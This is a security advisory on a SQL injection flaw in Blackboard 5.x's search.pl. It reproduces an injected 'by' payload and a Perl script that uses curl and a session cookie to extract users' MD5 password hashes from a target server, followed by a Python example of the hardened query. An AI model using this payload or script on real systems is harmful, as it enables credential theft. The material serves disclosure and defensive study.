Blackboard Learning System search.pl SQL Injection Vulnerability
Published: 2003-01-21
Updated: 2003-01-25
Affected systems:
Blackboard Blackboard 5.5.1
Blackboard Blackboard 5.5
Blackboard Blackboard 5.0.2
Blackboard Blackboard 5.0
Description:
BUGTRAQ ID: 6655
Blackboard is an online solution that provides academic, administrative, community and other educational services.
Blackboard does not adequately filter user-supplied input. A remote attacker can exploit this to query the Blackboard user directory without authorization and obtain the MD5 password hashes of arbitrary users, among other malicious activity.
The search script '/bin/common/search.pl' shipped with the system does not properly filter the parameters a user submits. By supplying crafted SQL in the 'by' parameter, an attacker can alter the logic of the original SQL query and obtain the MD5 password hash or directory information of any user. This information can then be used to attack the system further.
<*Source: Pedram Amini (pedram.amini@tulane.edu)
Link: http://pedram.redhive.com/advisories/blackboard5.txt
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Use it at your own risk!
/bin/common/search.pl?action=RESULTS
&context=USERDIR
&type=SEARCH
&operation=VIEW
&keyword=meow
&keywordraw=
&by=passwd) LIKE '%%' AND U.system_role = 't' AND upper(U.passwd
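To show why the 'by' parameter is the problem and how the server side should handle it, here is an added example (not code from the advisory or from Blackboard) written against an in-memory SQLite table with constructed rows. It assumes the flawed query has the shape upper(U.<by>) LIKE '%<keyword>%', which the advisory's payload implies but does not state, and it assumes an allow-list of searchable columns since the real schema is not given.

```python
import sqlite3

# Assumed allow-list of columns the directory search may use; the real
# Blackboard schema is not given in the advisory.
SEARCHABLE_COLUMNS = {"lastname", "firstname", "email"}

# The 'by' value from the advisory's test request, used here only to
# show that the hardened version rejects it.
INJECTED_BY = "passwd) LIKE '%%' AND U.system_role = 't' AND upper(U.passwd"


def make_db():
    """Constructed sample directory (not real Blackboard data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id TEXT, lastname TEXT, "
                 "passwd TEXT, system_role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        ("alice", "Smith", "0123abcd" * 4, "u"),   # regular user
        ("admin", "Jones", "abcd0123" * 4, "t"),   # system role 't'
    ])
    return conn


def search_vulnerable(conn, by, keyword):
    """Assumed shape of the flawed query: the column name arriving in
    'by' is spliced straight into the WHERE clause."""
    sql = (f"SELECT user_id, lastname FROM users U "
           f"WHERE upper(U.{by}) LIKE '%{keyword.upper()}%'")
    return conn.execute(sql).fetchall()


def is_allowed_column(by):
    """Exact-match allow-list: the only safe way to accept an identifier."""
    return by in SEARCHABLE_COLUMNS


def search_hardened(conn, by, keyword):
    """Allow-list the column name; bind the keyword as a parameter."""
    if not is_allowed_column(by):
        raise ValueError(f"unsupported search column: {by!r}")
    sql = f"SELECT user_id, lastname FROM users U WHERE upper(U.{by}) LIKE ?"
    return conn.execute(sql, (f"%{keyword.upper()}%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Injected 'by' rewrites the WHERE clause: only the 't' account comes back.
    print(search_vulnerable(db, INJECTED_BY, ""))
    print(search_hardened(db, "lastname", "smi"))
```

The identifier cannot be bound as a parameter, so the allow-list is what closes the hole; binding the keyword covers the other user-controlled value in the same clause.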
Test script:
#!/usr/bin/perl -w
#
# Blackboard Password Extractor
#
# pedram amini <http://pedram.redhive.com>
#
# - refer to the advisory for usage.
# - requires curl.
# - can be easily further automated.
#
# set these:
$password   = "abcd";                 # initial "narrow down" password.
$session_id = "\@\@123456abcd....";   # current valid session id.
$host       = "blackboard.xxxxx.xxx"; # target blackboard server.
$grep_for   = "lastname";             # target we're looking for.

# don't forget to comment out either the working forwards or backwards lines.
@chars = ('0', '1', '2', '3', '4', '5', '6', '7',
          '8', '9', 'a', 'b', 'c', 'd', 'e', 'f');

$url = "http://$host/bin/common/search.pl?action=RESULTS&context=USERDIR&type=SEARCH&operation=VIEW&keyword=MEOW&keywordraw=_SENTINAL_&by=passwd";
$url =~ s/&/\\&/g;

for ($keep_looking = 1; $keep_looking != 0; ) {
    for ($i = 0; $i <= $#chars; $i++) {
        # working forwards:
        #$cur_pass = $password . $chars[$i];
        # working backwards:
        #$cur_pass = $chars[$i] . $password;

        $cur_url = $url;
        $cur_url =~ s/_SENTINAL_/$cur_pass/;

        print "\n --> working ... $chars[$i]";

        $return = `curl --cookie session_id=$session_id $cur_url 2> /dev/null | grep -i $grep_for | wc -l`;
        $return =~ s/\s//g;

        print "\n --> returned ... $return";

        if ($return) {
            print "\n --> next char found: $chars[$i]";
            # working forwards:
            #$password .= $chars[$i];
            # working backwards:
            #$password = $chars[$i] . $password;
            $keep_looking = 1;
            $i = $#chars;
        } else {
            $keep_looking = 0;
        }

        sleep 1;
    }

    print "\n --> current password ... $password";
}
Recommendation:
Vendor patch:
Blackboard
----------
The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage:
Blackboard will release a security patch for this vulnerability shortly; users can contact the vendor for details.
Blackboard product support hotline:
1-888-788-5264
Or submit a service request via the web site:
http://company.blackboard.com/
Severity: 28 (reader vote)